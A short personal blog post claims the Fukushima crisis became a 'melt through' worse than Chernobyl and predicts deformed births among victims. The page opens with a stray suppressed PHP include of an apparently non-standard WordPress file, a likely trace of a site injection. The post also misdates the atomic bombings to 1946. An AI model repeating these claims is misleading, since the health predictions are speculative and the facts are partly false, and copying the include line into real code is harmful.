@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Fukushima Nuclear Melt Down? No. It's worse. Fukushima Nuclear Melt Through. - My Family Health Blog

Fukushima Nuclear Melt Down? No. It’s worse. Fukushima Nuclear Melt Through.

There seems to be no end of worse news for the Fukushima nuclear crisis. A few days ago they admit it was a nuclear melt down. Now they admit it is now a nuclear melt through. Melt through worse than melt down. Worst case scenario happening and getting worse every time. There seems to be no good news coming from Fukushima.

Russia Today reports a rabbit was born without ears in the fringes of the Fukushima exclusion zone. Wait until you see the people born. No need to speculate. We have Chernobyl as a documented example. You can search the internet for all those deformed babies born to the victims of Chernobyl. In a few years we will see what kind of babies this brings the victims of Fukushima.

Fukushima is turning out to be worse than Chernobyl, much worse. But the Japanese had survived 2 atomic bombs in 1946 so they should be able to survive this.

For a mainstream media report on the Fukushima Melt through, check out http://www.telegraph.co.uk/news/8565020/Nuclear-fuel-has-melted-through-base-of-Fukushima-plant.html